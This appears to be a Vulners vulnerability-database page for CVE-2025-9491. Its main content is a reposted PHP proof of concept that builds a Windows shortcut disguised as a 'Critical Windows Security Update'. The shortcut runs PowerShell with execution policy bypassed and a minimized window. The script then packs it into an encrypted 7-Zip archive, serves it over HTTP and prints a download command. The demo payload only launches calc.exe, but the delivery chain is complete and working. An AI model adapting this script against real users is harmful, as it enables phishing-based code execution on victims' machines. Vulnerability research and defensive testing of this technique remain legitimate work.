Vulners
Lucene search
📄 Microsoft Windows LNK File Remote Code Execution
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | November “In the Trend of VM” (#21): vulnerabilities in Windows, SharePoint, Redis, XWiki, Zimbra Collaboration, and Linux | 14 Nov 202520:44 | – | avleonov |
| About Remote Code Execution – Windows LNK File (CVE-2025-9491) vulnerability | 5 Nov 202514:14 | – | avleonov |
 | CVE-2025-9491 | 3 Sep 202503:00 | – | circl |
 | Microsoft Windows 安全漏洞 | 26 Aug 202500:00 | – | cnnvd |
 | CVE-2025-9491 | 26 Aug 202516:25 | – | cve |
 | CVE-2025-9491 Microsoft Windows LNK File UI Misrepresentation Remote Code Execution Vulnerability | 26 Aug 202516:25 | – | cvelist |
 | Exploit for User Interface (UI) Misrepresentation of Critical Information in Microsoft | 7 Nov 202514:52 | – | githubexploit |
 | EUVD-2025-28860 | 3 Oct 202520:07 | – | euvd |
 | CVE-2025-9491 | 26 Aug 202517:15 | – | nvd |
 | CVE-2025-9491 | 26 Aug 202517:15 | – | osv |
10
=============================================================================================================================================
| # Title : Windows LNK File UI Misrepresentation Vulnerability Leading to Remote Code Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : System built‑in component. No standalone download available |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212542/ & CVE-2025-9491
[+] Summary : This PHP script is a Proof-of-Concept (PoC) tool that demonstrates how to:
Create a Windows LNK (shortcut) file that executes a PowerShell command (in this example, launches calc.exe).
Package the LNK file into a 7-Zip archive, optionally with a password.
Host the archive on a simple HTTP server using PHP’s built-in server.
Provide a PowerShell command that can download the archive from the HTTP server.
It is meant for educational and defensive testing, not exploitation. It does not contain a real vulnerability — it simply shows the technique of using LNK + PowerShell delivery.
[+] Key technical points:
Uses Windows COM to create the LNK file.
Falls back to PowerShell if COM fails.
Optionally compresses with 7-Zip.
Starts HTTP server to serve the payload.
Designed to be run from the CLI on Windows.
POC : php poc.php
<?php
class WindowsLNKExploit {
private $scriptDir;
private $localIP;
public function __construct() {
$this->scriptDir = $this->getScriptDirectory();
$this->localIP = $this->getLocalIP();
}
private function getScriptDirectory() {
return dirname(__FILE__);
}
private function getLocalIP() {
$ip = gethostbyname(gethostname());
// محاولة الحصول على IP حقيقي
$sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
socket_connect($sock, "8.8.8.8", 53);
socket_getsockname($sock, $ip);
socket_close($sock);
return $ip;
}
public function createMaliciousLNK() {
$lnkPath = $this->scriptDir . '\\Critical_Update.lnk';
echo "[*] Creating malicious LNK file...\n";
try {
// في PHP على Windows، يمكن استخدام COM
$shell = new COM('WScript.Shell');
$shortcut = $shell->CreateShortcut($lnkPath);
$shortcut->TargetPath = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe';
$shortcut->Arguments = '-NoProfile -ExecutionPolicy Bypass -Command "Start-Process calc.exe; echo Windows Update Completed"';
$shortcut->WorkingDirectory = 'C:\\Windows\\System32';
$shortcut->Description = 'Critical Windows Security Update - KB5029244';
// محاولة تعيين أيقونة
$iconPaths = [
'C:\\Windows\\System32\\shell32.dll',
'C:\\Windows\\System32\\imageres.dll',
];
foreach ($iconPaths as $iconPath) {
if (file_exists($iconPath)) {
$shortcut->IconLocation = $iconPath . ',78';
break;
}
}
$shortcut->WindowStyle = 7; // SW_SHOWMINNOACTIVE
$shortcut->Save();
if (file_exists($lnkPath)) {
echo "[+] LNK created: $lnkPath\n";
return $lnkPath;
} else {
return null;
}
} catch (Exception $e) {
echo "[-] Error: " . $e->getMessage() . "\n";
// طريقة بديلة باستخدام PowerShell
return $this->createLNKWithPowerShell();
}
}
private function createLNKWithPowerShell() {
$lnkPath = $this->scriptDir . '\\Critical_Update.lnk';
$psScript = "
\$WshShell = New-Object -ComObject WScript.Shell
\$Shortcut = \$WshShell.CreateShortcut('$lnkPath')
\$Shortcut.TargetPath = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
\$Shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command \"Start-Process calc.exe; echo Windows Update Completed\"'
\$Shortcut.WorkingDirectory = 'C:\\Windows\\System32'
\$Shortcut.Description = 'Critical Windows Security Update - KB5029244'
\$Shortcut.IconLocation = 'C:\\Windows\\System32\\shell32.dll,78'
\$Shortcut.WindowStyle = 7
\$Shortcut.Save()
";
$psScript = base64_encode(iconv('UTF-8', 'UTF-16LE', $psScript));
$command = "powershell -ExecutionPolicy Bypass -EncodedCommand $psScript";
exec($command, $output, $returnCode);
if (file_exists($lnkPath)) {
echo "[+] LNK created via PowerShell: $lnkPath\n";
return $lnkPath;
}
return null;
}
public function compressWith7Zip($lnkPath, $password = null) {
if (!$lnkPath || !file_exists($lnkPath)) {
echo "[-] LNK file not found\n";
return null;
}
// البحث عن 7-Zip
$sevenZipPaths = [
'C:\\Program Files\\7-Zip\\7z.exe',
'C:\\Program Files (x86)\\7-Zip\\7z.exe',
'7z.exe',
];
$sevenZip = null;
foreach ($sevenZipPaths as $path) {
if (file_exists($path)) {
$sevenZip = $path;
break;
}
}
if (!$sevenZip) {
// البحث في PATH
exec('where 7z', $output, $returnCode);
if ($returnCode === 0) {
$sevenZip = '7z';
} else {
echo "[-] 7-Zip not found\n";
return null;
}
}
$archiveName = $this->scriptDir . '\\update.7z';
// بناء الأمر
$cmd = escapeshellarg($sevenZip) . " a " . escapeshellarg($archiveName) . " " . escapeshellarg($lnkPath);
if ($password) {
$cmd .= " -p" . escapeshellarg($password);
}
$cmd .= " -mx9 -mhe=on -t7z";
echo "[*] Compressing with 7-Zip...\n";
exec($cmd, $output, $returnCode);
if ($returnCode === 0 && file_exists($archiveName)) {
echo "[+] Archive created: $archiveName\n";
if ($password) {
echo "[+] Password: $password\n";
}
return $archiveName;
} else {
echo "[-] Compression failed\n";
return null;
}
}
public function startHTTPServer($port = 8080) {
echo "[+] Starting PHP built-in server on http://{$this->localIP}:$port\n";
echo "[+] Download URL: http://{$this->localIP}:$port/update.7z\n";
echo "[+] Server running... Press Ctrl+C to stop\n";
$publicDir = $this->scriptDir;
// إنشاء ملف router بسيط
$routerScript = $publicDir . '\\router.php';
$routerContent = '<?php
$request = $_SERVER["REQUEST_URI"];
if ($request === "/" || $request === "/update.7z") {
$file = __DIR__ . "\\update.7z";
if (file_exists($file)) {
header("Content-Type: application/x-7z-compressed");
header("Content-Disposition: attachment; filename=\\"update.7z\\"");
header("Content-Length: " . filesize($file));
readfile($file);
echo "[+] CVE-2025-9491: Malicious LNK served to " . $_SERVER["REMOTE_ADDR"] . "\\n";
exit;
}
}
http_response_code(404);
echo "404 Not Found";
?>';
file_put_contents($routerScript, $routerContent);
// تشغيل الخادم
$command = "php -S {$this->localIP}:$port -t " . escapeshellarg($publicDir) . " " . escapeshellarg($routerScript);
echo "Command: $command\n";
echo "You need to run this command manually in another terminal:\n";
echo $command . "\n\n";
// بدلاً من ذلك، يمكن استخدام exec() مع nohup على Unix-like systems
// على Windows، يمكن استخدام start
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$cmdFile = $publicDir . '\\start_server.bat';
$batchContent = "@echo off\nstart /B $command\n";
file_put_contents($cmdFile, $batchContent);
echo "[+] Created batch file: $cmdFile\n";
echo "[+] Run it in a new terminal window\n";
}
}
public function main() {
echo str_repeat("=", 60) . "\n";
echo "CVE-2025-9491 LNK Exploit + 7-Zip + HTTP Server (PHP Version)\n";
echo str_repeat("=", 60) . "\n";
// التحقق من نظام التشغيل
if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') {
echo "[-] This script requires Windows OS\n";
return;
}
// إنشاء ملف LNK
$lnkFile = $this->createMaliciousLNK();
if (!$lnkFile) {
echo "[-] Failed to create LNK\n";
return;
}
// ضغط مع 7-Zip
echo "\n[*] Compress with 7-Zip? (y/n): ";
$compress = trim(strtolower(fgets(STDIN)));
if ($compress === 'y') {
echo "[*] Password (optional): ";
$password = trim(fgets(STDIN));
if (empty($password)) {
$password = null;
}
$archive = $this->compressWith7Zip($lnkFile, $password);
if ($archive) {
echo "\n[+] Archive ready: $archive\n";
// بدء خادم HTTP
echo "\n[*] Start HTTP server? (y/n): ";
$startServer = trim(strtolower(fgets(STDIN)));
if ($startServer === 'y') {
$this->startHTTPServer();
}
echo "\n[+] PowerShell download command:\n";
echo " iwr http://{$this->localIP}:8080/update.7z -OutFile update.7z\n";
// الانتظار للإدخال
echo "\n[*] Press Enter to exit...";
fgets(STDIN);
} else {
echo "[-] Compression failed\n";
echo "[*] Use raw LNK: $lnkFile\n";
}
} else {
echo "\n[*] Raw LNK file: $lnkFile\n";
}
}
public function generatePowerShellDownloadCommand() {
return "iwr http://{$this->localIP}:8080/update.7z -OutFile update.7z";
}
}
// التنظيف التلقائي
register_shutdown_function(function() {
// يمكن إضافة تنظيف الملفات المؤقتة هنا
});
// التنفيذ
if (PHP_SAPI === 'cli') {
$exploit = new WindowsLNKExploit();
$exploit->main();
} else {
echo "This script must be run from command line (CLI)\n";
echo "Usage: php " . basename(__FILE__) . "\n";
}
// وظائف مساعدة إضافية
class HelperFunctions {
public static function checkRequirements() {
$checks = [
'PHP Version' => version_compare(PHP_VERSION, '7.0.0', '>='),
'Windows OS' => (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'),
'COM Support' => extension_loaded('com_dotnet'),
'Exec Function' => function_exists('exec'),
];
return $checks;
}
public static function showBanner() {
$banner = "
╔═══════════════════════════════════════════════════════════╗
║ CVE-2025-9491 PoC ║
║ Author: indoushka ║
╚═══════════════════════════════════════════════════════════╝
";
echo $banner . "\n";
}
}
// بديل لاستخدام threading في PHP
class BackgroundProcess {
public static function runInBackground($command) {
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
pclose(popen("start /B " . $command, "r"));
} else {
exec($command . " > /dev/null 2>&1 &");
}
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Mar 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.13.3 - 7.8
CVSS 44.6
CVSS 37
EPSS0.00912
SSVC